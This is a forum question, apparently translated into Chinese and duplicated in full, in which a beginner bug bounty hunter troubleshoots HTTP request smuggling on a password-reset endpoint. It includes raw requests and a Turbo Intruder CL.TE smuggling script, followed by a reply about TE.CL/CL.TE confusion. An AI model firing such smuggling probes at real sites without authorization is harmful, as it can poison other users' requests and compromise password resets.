使用 Turbo Intruder 时出现奇怪的响应
Strange response when using Turbo Intruder
我是一名漏洞赏金猎人,而且是新手。几天前,我了解到 请求走私 漏洞。就在那之后,我开始在互联网上查找它。昨天,我发现一个网站,当我将 X-Forwarded-Host: google.com 添加到 header 时,它会将我重定向到 https://www.google.com。很难利用它,所以我考虑将它与 请求走私 结合起来。我选择更改密码请求作为目标:
POST /my-rx/forgot-password HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Connection: close
Cookie: <my_cookie>
Upgrade-Insecure-Requests: 1
email=mymail%40gmail.com&submit=Reset+My+Password&csrf_token=cb5a82b3df1e45c7b95d25edb46cfbf3
我将其转换为分块:
POST /my-rx/forgot-password HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Connection: close
Cookie: <my_cookie>
Upgrade-Insecure-Requests: 1
Transfer-Encoding: chunked
6b
email=mymail%40gmail.com&submit=Reset+My+Password&csrf_token=cb5a82b3df1e45c7b95d25edb46cfbf3
0
但是当我发送它时,它给了我 503 client read error 代码。看起来它不接受 chunked。但是,我仍然想继续,所以我在 Burp Suite 上下载了 HTTP Request Smuggler 和 Turbo Intruder 扩展。然后我做 走私攻击 (CL.TE)。它给出了走私攻击python代码:
# if you edit this file, ensure you keep the line endings as CRLF or you'll have a bad time
def queueRequests(target, wordlists):
# to use Burp's HTTP stack for upstream proxy rules etc, use engine=Engine.BURP
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=5,
requestsPerConnection=1,
resumeSSL=False,
timeout=10,
pipeline=False,
maxRetriesPerRequest=0,
engine=Engine.THREADED,
)
# This will prefix the victim's request. Edit it to achieve the desired effect.
prefix = '''GET /hopefully404 HTTP/1.1
X-Ignore: X'''
# The request engine will auto-fix the content-length for us
attack = target.req + prefix
engine.queue(attack)
victim = target.req
for i in range(14):
engine.queue(victim)
time.sleep(0.05)
def handleResponse(req, interesting):
table.add(req)
然后我 运行 使用 Turbo Intruder。我很惊讶,它发送了 14 个请求,但只有 12 个请求是 503,剩下 2 个是 200。特别的,在 200 响应 header 中,它有 ...transfer-encoding: chunked...。我已经尝试了几次,结果都是一样的:1 或 2 个请求是 200。但是这里有些奇怪,在代码中,它是 ...prefix = '''GET /hopefully404 HTTP/1.1
X-Ignore: X'''...。经过几次测试,我认为这不是请求走私错误,因为响应显示它是原始请求的响应,而不是代码中的 prefix (我也尝试更改 prefix 并且它仍然是 200,而不是 400,404,...如我所料)。
那么有没有人(必须是非常专业的黑客)知道我面临的是什么漏洞?谢谢!
首先,你的第一个转换请求是在TE;CL中分块的,但是在使用burp扩展后你发现了它的CL;TE,所以问题可能就在那里。
对于您有点困惑的回复,我建议您解决 portswigger http 请求走私实验室,因为我最近已经完成了,您的基础知识将变得非常强大!
我是一名漏洞赏金猎人,而且是新手。几天前,我了解到 请求走私 漏洞。就在那之后,我开始在互联网上查找它。昨天,我发现一个网站,当我将 X-Forwarded-Host: google.com 添加到 header 时,它会将我重定向到 https://www.google.com。很难利用它,所以我考虑将它与 请求走私 结合起来。我选择更改密码请求作为目标:
POST /my-rx/forgot-password HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Connection: close
Cookie: <my_cookie>
Upgrade-Insecure-Requests: 1
email=mymail%40gmail.com&submit=Reset+My+Password&csrf_token=cb5a82b3df1e45c7b95d25edb46cfbf3
我将其转换为分块:
POST /my-rx/forgot-password HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Connection: close
Cookie: <my_cookie>
Upgrade-Insecure-Requests: 1
Transfer-Encoding: chunked
6b
email=mymail%40gmail.com&submit=Reset+My+Password&csrf_token=cb5a82b3df1e45c7b95d25edb46cfbf3
0
但是当我发送它时,它给了我 503 client read error 代码。看起来它不接受 chunked。但是,我仍然想继续,所以我在 Burp Suite 上下载了 HTTP Request Smuggler 和 Turbo Intruder 扩展。然后我做 走私攻击 (CL.TE)。它给出了走私攻击python代码:
# if you edit this file, ensure you keep the line endings as CRLF or you'll have a bad time
def queueRequests(target, wordlists):
# to use Burp's HTTP stack for upstream proxy rules etc, use engine=Engine.BURP
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=5,
requestsPerConnection=1,
resumeSSL=False,
timeout=10,
pipeline=False,
maxRetriesPerRequest=0,
engine=Engine.THREADED,
)
# This will prefix the victim's request. Edit it to achieve the desired effect.
prefix = '''GET /hopefully404 HTTP/1.1
X-Ignore: X'''
# The request engine will auto-fix the content-length for us
attack = target.req + prefix
engine.queue(attack)
victim = target.req
for i in range(14):
engine.queue(victim)
time.sleep(0.05)
def handleResponse(req, interesting):
table.add(req)
然后我 运行 使用 Turbo Intruder。我很惊讶,它发送了 14 个请求,但只有 12 个请求是 503,剩下 2 个是 200。特别的,在 200 响应 header 中,它有 ...transfer-encoding: chunked...。我已经尝试了几次,结果都是一样的:1 或 2 个请求是 200。但是这里有些奇怪,在代码中,它是 ...prefix = '''GET /hopefully404 HTTP/1.1
X-Ignore: X'''...。经过几次测试,我认为这不是请求走私错误,因为响应显示它是原始请求的响应,而不是代码中的 prefix (我也尝试更改 prefix 并且它仍然是 200,而不是 400,404,...如我所料)。
那么有没有人(必须是非常专业的黑客)知道我面临的是什么漏洞?谢谢!
首先,你的第一个转换请求是在TE;CL中分块的,但是在使用burp扩展后你发现了它的CL;TE,所以问题可能就在那里。 对于您有点困惑的回复,我建议您解决 portswigger http 请求走私实验室,因为我最近已经完成了,您的基础知识将变得非常强大!